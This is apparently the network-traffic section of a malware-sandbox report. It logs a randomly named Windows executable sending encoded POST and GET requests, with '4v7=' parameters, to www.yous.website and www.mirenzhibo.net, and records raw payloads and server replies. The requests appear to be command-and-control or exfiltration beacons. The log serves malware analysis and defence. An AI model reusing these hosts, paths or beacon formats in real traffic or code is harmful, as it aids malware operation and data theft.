                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:39.828026056 CET709OUTPOST /sd58/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.yous.website
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.yous.website
                                                                                                                                                                                                                                              Referer: http://www.yous.website/sd58/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 220
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Raw: 34 76 37 3d 6e 64 6f 74 2f 64 54 75 73 32 2f 68 32 4d 78 6e 78 66 30 5a 75 75 2f 6b 38 34 75 37 43 6b 4a 45 73 45 59 30 77 64 51 41 47 72 68 70 30 42 57 70 44 44 7a 4b 72 72 2b 77 58 51 62 41 73 4b 42 75 75 44 77 4a 71 46 69 62 51 47 53 72 68 63 6d 78 78 79 44 73 79 63 6c 6b 44 6f 63 2f 45 6d 61 6b 68 47 51 62 2f 7a 78 6a 49 6f 6e 2f 35 7a 7a 6a 34 64 4b 43 4b 50 32 74 44 4d 71 6f 79 73 67 76 42 72 2b 55 38 49 63 58 6e 47 78 73 47 76 68 71 2b 72 41 46 51 6e 67 66 57 35 45 6e 4d 69 45 48 31 38 59 67 52 55 68 77 6d 47 55 45 2b 4f 72 79 4d 51 78 78 65 52 68 79 78 4d 66 6f 32 58 47 72 36 4a 32 4e 46 59 78 48 31 62 4a 47 73 6d 4d 68 6b 31 37 6c 34 76 59 3d
                                                                                                                                                                                                                                              Data Ascii: 4v7=ndot/dTus2/h2Mxnxf0Zuu/k84u7CkJEsEY0wdQAGrhp0BWpDDzKrr+wXQbAsKBuuDwJqFibQGSrhcmxxyDsyclkDoc/EmakhGQb/zxjIon/5zzj4dKCKP2tDMqoysgvBr+U8IcXnGxsGvhq+rAFQngfW5EnMiEH18YgRUhwmGUE+OryMQxxeRhyxMfo2XGr6J2NFYxH1bJGsmMhk17l4vY=
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:41.037542105 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 03:08:40 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              7192.168.2.449805209.74.79.40804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:42.491025925 CET10791OUTPOST /sd58/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.yous.website
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.yous.website
                                                                                                                                                                                                                                              Referer: http://www.yous.website/sd58/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 10300
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Raw: 34 76 37 3d 6e 64 6f 74 2f 64 54 75 73 32 2f 68 32 4d 78 6e 78 66 30 5a 75 75 2f 6b 38 34 75 37 43 6b 4a 45 73 45 59 30 77 64 51 41 47 71 5a 70 30 7a 75 70 44 6b 6e 4b 74 62 2b 77 4a 67 62 46 73 4b 42 57 75 44 5a 68 71 46 2f 67 51 45 61 72 6e 38 36 78 36 6a 44 73 34 63 6c 6b 63 34 63 2b 5a 57 61 4c 68 47 41 58 2f 7a 68 6a 49 6f 6e 2f 35 77 72 6a 70 49 2b 43 47 76 32 71 55 38 71 6b 67 63 67 54 42 76 53 45 38 49 51 74 6e 32 52 73 47 4f 52 71 38 5a 59 46 59 6e 67 5a 52 35 45 76 4d 69 35 48 31 38 45 43 52 55 56 4f 6d 46 49 45 37 50 47 2f 63 69 42 6c 41 43 78 51 78 50 32 4f 39 6e 47 72 35 4b 71 6e 44 49 46 50 72 70 4e 52 6b 46 70 34 39 78 48 56 71 70 6e 44 76 42 56 72 36 41 56 64 36 4c 74 55 39 7a 37 68 38 64 30 6c 66 52 72 66 74 6b 55 49 33 7a 70 41 4e 34 30 62 38 42 41 61 63 65 68 35 36 67 56 65 65 4d 6d 75 55 55 50 56 4b 53 31 54 64 50 70 6a 76 76 65 38 79 54 55 61 62 75 6a 35 62 45 32 49 6c 7a 77 45 77 65 75 30 4c 52 73 33 39 38 43 6b 75 79 38 71 50 2f 47 61 36 42 4e 74 74 45 33 77 68 57 69 42 31 52 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 4v7=ndot/dTus2/h2Mxnxf0Zuu/k84u7CkJEsEY0wdQAGqZp0zupDknKtb+wJgbFsKBWuDZhqF/gQEarn86x6jDs4clkc4c+ZWaLhGAX/zhjIon/5wrjpI+CGv2qU8qkgcgTBvSE8IQtn2RsGORq8ZYFYngZR5EvMi5H18ECRUVOmFIE7PG/ciBlACxQxP2O9nGr5KqnDIFPrpNRkFp49xHVqpnDvBVr6AVd6LtU9z7h8d0lfRrftkUI3zpAN40b8BAaceh56gVeeMmuUUPVKS1TdPpjvve8yTUabuj5bE2IlzwEweu0LRs398Ckuy8qP/Ga6BNttE3whWiB1Ryz5fbn1LVhZ2ZDoRrQOi+IPIwokFzaYx7tXucDBsX/4If2iw+W0L8k1xwNqAe/7R9FCHCOkMvPeGvB/AQ5orjL2gTmR/550Jf61db5u4LdsWGGh5Xqm/qJ+iy4nJ3iOAjQyCtXi4FAKGSQOn3dcHueM9cg5g6xjWc7ADt5l3w+i7yKQNtN/WPOLeOsN67rGfkxgFMjcrio8Ngu9G6/CQaaW3upYj7h+wvR6KNxlsgAqUp+aDbkn497o/J4gsbKX2SRcxD/slv3wfQsKPBGfwKvR0T2PJXa+DroACwHj5aaEB9gqLGC7mpNTVHb/xZy7juR+xhQ0lFW6kVZWkDAdcSnjAix8sp1alKclcNeV7kOJa+XpC/tYMu5wXfFihFwz7m5VufvdSsLERYqU2+Ua7yrlGp09JjRD+wPzin6mV0tYCk1JRzSGtmT+eMDhg9rkeafGYyVbUbWK3DTWAc58T2qR3mUQzdUTXfJhPndXV/bpYW8IPdW6lBh71qFLENtl45JCbq1N63nEAhV+H3o06h3NdNp4ru5nqI8JkEpl90XFekMpPLh0hut4SlGgNLYy4JVGk5BNwI1V1Qs8BuvrIXNN8vNDfndJ/SILBRS8FGQtwgfPycPxqMZdNkCM4w+8awY2/hqpKbI42nRXX2uvPwzC90Ph8O79cqJ [TRUNCATED]
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:43.781328917 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 03:08:43 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              8192.168.2.449811209.74.79.40804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:45.144273996 CET423OUTGET /sd58/?4v7=qfAN8teQqWHl0pB75/wJ4PX285H5E3s25CgjwOd4PKd8zFqJMRX78aaJW2P6tpRkk2pp9lWkT1iA/dTcpEbuyLhsAas7SiW6kXoDkzQ8RaPJjUuFvtCyEK8=&pRel=chN0 HTTP/1.1
                                                                                                                                                                                                                                              Host: www.yous.website
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:46.360881090 CET548INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 03:08:46 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              9192.168.2.449827202.95.11.110804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:52.079603910 CET695OUTPOST /qiu4/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.mirenzhibo.net
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.mirenzhibo.net
                                                                                                                                                                                                                                              Referer: http://www.mirenzhibo.net/qiu4/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 200
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Raw: 34 76 37 3d 56 44 2f 70 67 7a 73 71 62 35 4c 4b 48 51 63 59 58 5a 6d 31 2b 49 74 70 63 72 71 69 71 79 48 36 73 58 70 54 4a 4a 61 4d 50 33 51 44 49 6f 77 6e 32 36 46 30 61 2b 36 43 63 62 7a 6f 54 6a 32 6d 6b 47 48 7a 72 6d 6e 6d 78 79 61 6c 66 69 44 47 75 76 53 71 45 4e 68 50 51 34 49 4c 4e 49 71 72 53 6d 48 45 73 71 4d 64 64 36 75 53 4d 59 6c 33 74 52 69 79 54 57 30 32 49 33 41 36 67 67 6f 50 4f 79 39 4d 56 4d 35 4e 45 38 67 4e 6f 49 2b 44 64 33 64 35 33 35 71 79 74 35 75 54 55 76 4b 6e 50 32 51 48 6f 67 48 6d 7a 53 38 46 75 68 41 51 69 38 33 57 37 37 62 6f 41 78 4a 51 45 45 58 52 48 77 3d 3d
                                                                                                                                                                                                                                              Data Ascii: 4v7=VD/pgzsqb5LKHQcYXZm1+ItpcrqiqyH6sXpTJJaMP3QDIown26F0a+6CcbzoTj2mkGHzrmnmxyalfiDGuvSqENhPQ4ILNIqrSmHEsqMdd6uSMYl3tRiyTW02I3A6ggoPOy9MVM5NE8gNoI+Dd3d535qyt5uTUvKnP2QHogHmzS8FuhAQi83W77boAxJQEEXRHw==
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:53.623078108 CET190INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 03:08:53 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: d404 Not Found0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              10192.168.2.449836202.95.11.110804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:54.747037888 CET715OUTPOST /qiu4/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.mirenzhibo.net
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.mirenzhibo.net
                                                                                                                                                                                                                                              Referer: http://www.mirenzhibo.net/qiu4/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 220
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Raw: 34 76 37 3d 56 44 2f 70 67 7a 73 71 62 35 4c 4b 48 78 73 59 56 34 6d 31 34 6f 74 71 41 37 71 69 6b 69 48 2b 73 58 74 54 4a 49 76 42 50 6c 6b 44 49 4a 41 6e 78 37 46 30 57 65 36 43 55 37 7a 58 64 44 32 54 6b 47 44 52 72 6d 62 6d 78 79 2b 6c 66 67 62 47 75 59 6d 70 47 64 68 4a 57 34 49 4e 51 34 71 72 53 6d 48 45 73 72 73 33 64 36 32 53 4e 70 31 33 76 7a 61 7a 51 57 30 31 41 58 41 36 72 41 6f 4c 4f 79 38 5a 56 4e 6c 6a 45 36 6b 4e 6f 49 4f 44 54 43 39 2b 74 70 71 77 70 35 76 47 66 2b 37 75 4a 6a 35 6b 32 6a 48 49 39 44 49 71 69 48 4e 4b 7a 4e 57 42 70 37 2f 62 64 32 41 6b 4a 48 71 59 63 37 62 6c 6f 78 68 36 66 70 45 65 6e 61 46 6e 34 48 36 69 53 51 30 3d
                                                                                                                                                                                                                                              Data Ascii: 4v7=VD/pgzsqb5LKHxsYV4m14otqA7qikiH+sXtTJIvBPlkDIJAnx7F0We6CU7zXdD2TkGDRrmbmxy+lfgbGuYmpGdhJW4INQ4qrSmHEsrs3d62SNp13vzazQW01AXA6rAoLOy8ZVNljE6kNoIODTC9+tpqwp5vGf+7uJj5k2jHI9DIqiHNKzNWBp7/bd2AkJHqYc7bloxh6fpEenaFn4H6iSQ0=
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:56.288230896 CET190INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 03:08:56 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: d404 Not Found0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              11192.168.2.449842202.95.11.110804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:57.422233105 CET10797OUTPOST /qiu4/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.mirenzhibo.net
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.mirenzhibo.net
                                                                                                                                                                                                                                              Referer: http://www.mirenzhibo.net/qiu4/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 10300
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Raw: 34 76 37 3d 56 44 2f 70 67 7a 73 71 62 35 4c 4b 48 78 73 59 56 34 6d 31 34 6f 74 71 41 37 71 69 6b 69 48 2b 73 58 74 54 4a 49 76 42 50 6c 63 44 4a 2b 6f 6e 78 59 39 30 56 65 36 43 58 37 7a 73 64 44 32 4f 6b 47 37 56 72 6d 58 32 78 77 32 6c 65 44 54 47 6f 74 4b 70 4d 64 68 4a 62 59 49 49 4e 49 71 79 53 6d 32 50 73 72 63 33 64 36 32 53 4e 71 64 33 68 78 69 7a 66 32 30 32 49 33 41 4d 67 67 6f 6a 4f 78 4e 69 56 4e 68 64 45 4b 45 4e 6f 6f 65 44 52 78 56 2b 31 35 71 49 75 35 75 46 66 2b 33 74 4a 6e 68 53 32 67 62 69 39 44 38 71 7a 57 77 75 76 70 4f 32 2b 4b 44 42 41 30 45 6c 52 33 4b 70 46 34 44 38 76 6a 42 52 4b 4b 6f 73 2f 59 59 49 38 6d 6a 69 4f 58 35 62 6c 36 47 36 76 42 70 71 74 44 56 44 30 58 53 75 74 35 56 45 4e 34 34 4e 65 69 68 56 55 34 76 42 6b 67 51 58 44 33 52 55 56 4e 54 55 41 34 45 43 45 4a 6d 4c 64 5a 6c 33 6d 56 73 38 65 43 61 63 41 36 45 31 6a 47 6c 79 52 52 5a 52 33 51 72 68 79 4a 52 54 45 64 35 4a 77 5a 7a 43 75 67 50 51 59 66 4b 61 41 78 58 52 2f 49 45 2f 6b 4d 62 76 58 4a 6e 43 34 4a [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 4v7=VD/pgzsqb5LKHxsYV4m14otqA7qikiH+sXtTJIvBPlcDJ+onxY90Ve6CX7zsdD2OkG7VrmX2xw2leDTGotKpMdhJbYIINIqySm2Psrc3d62SNqd3hxizf202I3AMggojOxNiVNhdEKENooeDRxV+15qIu5uFf+3tJnhS2gbi9D8qzWwuvpO2+KDBA0ElR3KpF4D8vjBRKKos/YYI8mjiOX5bl6G6vBpqtDVD0XSut5VEN44NeihVU4vBkgQXD3RUVNTUA4ECEJmLdZl3mVs8eCacA6E1jGlyRRZR3QrhyJRTEd5JwZzCugPQYfKaAxXR/IE/kMbvXJnC4JGJecGIOTuY3/dxpaI7YSmdzeuXpzgH29bCQnFzQOvHp0q89IZ2x5mG++4v/a7cq37eHWFnkSY8o37JHkJbeedculWmlT8g2lXoLWwF9vV3GxwZc6yYs97XWeOB8YvOAMCrc8XZxwHKHD50rXQs0i4u8HrQ72uyDmNYbcy8HXvJOqfooUiFybX+u7pm1xyE6eUA2+v3cSJlqDKWkmg6tGomTcIhw2RnEc4IS5vKeSOaZr6B1vWlYk8rcyuqinCA7GMEAQrlps3gno0g/8AzT/EzSRh8KzrwmVvfcPft99oo5OHkFkfeEoFa4s1clyvpJiElgzY+38GtAYOLyp0p2VWAYZtPnj8VWQBagHHFw39hHw5eUqxzfBTsZrBZrAUU/nYVjjbGjnIc3sEElY8cJqmgnHHpB/NZZS33ERbYuImy9t0KBcG0uYFiI5g+g8/IQNefa+c4T/AgpT+ojjs+F5I7dLcXo9TaNzJwQG1DN7jAbWFzIIgcHg9XsifoQjGcKt7jMRXg1TaRp0PhFWcAar8h0PnpQZa4bL/y4B/s96YKSaO19UcnArKe+jE0EYIopK/lOESM2wR2Cc1OM8cQLRjWytso8JTRFlzWcUiNo/9/xkpQ7vZYVEOlFhjeWh1U7c9Va33KivStGTRD2FvZ1pkrdsESvsyuma/z [TRUNCATED]


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              12192.168.2.449850202.95.11.110804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:00.111288071 CET425OUTGET /qiu4/?4v7=YBXJjFFON5DPMwFVWr+hwJljRIjxpgK+/QxKc43NeU4JKf8f+IoPZInAdaP+cGuotGfyq3307yGnLgei346rHNdmY6IWbN+gRmHxztRtQ7iWQPlqqkvpfgI=&pRel=chN0 HTTP/1.1
                                                                                                                                                                                                                                              Host: www.mirenzhibo.net
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:01.789521933 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 03:09:01 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
